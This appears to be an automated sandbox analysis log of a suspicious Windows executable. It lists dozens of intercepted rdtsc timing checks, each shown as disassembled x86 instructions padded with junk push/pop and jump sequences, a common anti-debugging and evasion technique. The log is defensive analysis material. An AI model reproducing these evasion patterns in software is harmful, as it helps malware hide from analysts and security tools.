Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166407A second address: 166407E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166407E second address: 1664099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96652499FAh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1664099 second address: 1475A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F9665989DB2h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jg 00007F9665989DB5h 0x0000001a pop eax 0x0000001b cmc 0x0000001c push dword ptr [ebp+12A003D1h] 0x00000022 jnp 00007F9665989DA7h 0x00000028 clc 0x00000029 call dword ptr [ebp+12A0291Eh] 0x0000002f pushad 0x00000030 pushad 0x00000031 jbe 00007F9665989DACh 0x00000037 or dword ptr [ebp+12A02622h], ecx 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 jmp 00007F9665989DADh 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+12A024E8h], edx 0x0000004f mov dword ptr [ebp+12A038E7h], eax 0x00000055 pushad 0x00000056 mov dl, cl 0x00000058 mov esi, dword ptr [ebp+12A03873h] 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 jo 00007F9665989DACh 0x0000006a xor dword ptr [ebp+12A02622h], eax 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 jmp 00007F9665989DB9h 0x00000079 lodsw 0x0000007b cmc 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 je 00007F9665989DACh 0x00000086 mov dword ptr [ebp+12A024E8h], edx 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 pushad 0x00000091 sub esi, dword ptr [ebp+12A038D3h] 0x00000097 sub ecx, 68227A00h 0x0000009d popad 0x0000009e push eax 0x0000009f jp 00007F9665989DB4h 0x000000a5 pushad 0x000000a6 jns 00007F9665989DA6h 0x000000ac push eax 0x000000ad push edx 0x000000ae rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669167 second address: 1669175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F96652499F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669175 second address: 1669181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9665989DA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669181 second address: 16691A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9665249A03h 0x0000000b jp 00007F96652499F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16691A6 second address: 16691DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9665989DACh 0x0000000c je 00007F9665989DBDh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F9665989DB5h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16691DA second address: 16691DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1667E09 second address: 1667E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668422 second address: 1668428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166872A second address: 166873E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9665989DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F9665989DBAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166873E second address: 166875A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96652499FEh 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668CC0 second address: 1668CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668CC4 second address: 1668CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E60 second address: 1668E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F9665989DB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E80 second address: 1668E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E84 second address: 1668E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1668E8C second address: 1668E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1669015 second address: 1669019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C59A second address: 166C59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C59F second address: 166C5A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5A4 second address: 166C5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5AF second address: 166C5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166C5CE second address: 166C5D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED2D second address: 15EED31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED31 second address: 15EED39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15EED39 second address: 15EED47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9665989DA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166F32C second address: 166F332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 166F332 second address: 166F339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16728F0 second address: 1672911 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F96652499F6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F9665249A04h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672911 second address: 1672939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9665989DA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F9665989DB3h 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672939 second address: 1672942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672942 second address: 1672946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1632EB6 second address: 16199D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, dword ptr [ebp+12A03607h] 0x0000000f lea eax, dword ptr [ebp+12BC0C1Bh] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F96652499F8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f call 00007F9665249A09h 0x00000034 or dword ptr [ebp+12A0238Ch], edi 0x0000003a pop ecx 0x0000003b nop 0x0000003c jmp 00007F96652499FEh 0x00000041 push eax 0x00000042 jnl 00007F96652499FEh 0x00000048 nop 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007F96652499F8h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 sub dword ptr [ebp+12A023F2h], ebx 0x00000069 call dword ptr [ebp+12B8F804h] 0x0000006f push eax 0x00000070 push edx 0x00000071 jl 00007F96652499FCh 0x00000077 jo 00007F96652499F6h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16330EE second address: 16330F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163339F second address: 16333AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F96652499F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163355F second address: 1633566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633566 second address: 163359C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9665249A06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163359C second address: 1633649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F9665989DB6h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F9665989DAEh 0x0000001a jne 00007F9665989DACh 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push ecx 0x00000026 pushad 0x00000027 push edx 0x00000028 pop edx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c pop ecx 0x0000002d pop eax 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F9665989DA8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+12B92569h], eax 0x0000004e call 00007F9665989DA9h 0x00000053 jnp 00007F9665989DAEh 0x00000059 jns 00007F9665989DA8h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 ja 00007F9665989DB1h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633649 second address: 1633665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665249A07h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633665 second address: 1633675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633675 second address: 163367A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633814 second address: 163381A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633918 second address: 1633933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665249A06h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633933 second address: 1633970 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9665989DA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007F9665989DB2h 0x00000014 jmp 00007F9665989DACh 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jmp 00007F9665989DB4h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633970 second address: 1633974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633BF2 second address: 1633C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F9665989DCAh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F9665989DA8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a pushad 0x0000002b mov si, 13DCh 0x0000002f popad 0x00000030 push 00000004h 0x00000032 mov dword ptr [ebp+12A023F2h], esi 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9665989DAFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633C63 second address: 1633C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1633C0F second address: 1633C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F9665989DA8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 pushad 0x00000025 mov si, 13DCh 0x00000029 popad 0x0000002a push 00000004h 0x0000002c mov dword ptr [ebp+12A023F2h], esi 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F9665989DAFh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16344BB second address: 163451A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b mov cl, 39h 0x0000000d lea eax, dword ptr [ebp+12BC0C5Fh] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F96652499F8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+12B8D634h], edx 0x00000033 nop 0x00000034 push eax 0x00000035 jmp 00007F9665249A06h 0x0000003a pop eax 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163451A second address: 163453C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9665989DAFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 163453C second address: 161A58C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F96652499F8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 or dl, 00000004h 0x00000025 xor dword ptr [ebp+12A0263Eh], esi 0x0000002b lea eax, dword ptr [ebp+12BC0C1Bh] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9665249A05h 0x00000038 pop edx 0x00000039 mov dword ptr [esp], eax 0x0000003c mov edx, dword ptr [ebp+12A0363Fh] 0x00000042 call dword ptr [ebp+12A01CADh] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 161A58C second address: 161A590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672C4B second address: 1672C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672DEE second address: 1672E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F9665989DACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E07 second address: 1672E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F96652499FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E13 second address: 1672E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9665989DB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E36 second address: 1672E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E3A second address: 1672E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E40 second address: 1672E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A08h 0x00000009 jmp 00007F9665249A08h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1672E74 second address: 1672E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1673259 second address: 167326A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 167326A second address: 1673278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1679ED9 second address: 1679EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1678D94 second address: 1678D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1678F27 second address: 1678F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9665249A00h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1678F3E second address: 1678F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9665989DB6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1678F73 second address: 1678F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665249A02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1679392 second address: 16793A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnc 00007F9665989DA8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16793A3 second address: 16793D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665249A07h 0x00000008 jmp 00007F9665249A02h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16797E4 second address: 16797FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9665989DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F9665989DACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16797FA second address: 167980F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F96652499FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 167980F second address: 1679819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9665989DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16799C6 second address: 16799CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16799CA second address: 16799CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 167B496 second address: 167B4C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A05h 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F96652499FCh 0x00000014 rdtsc
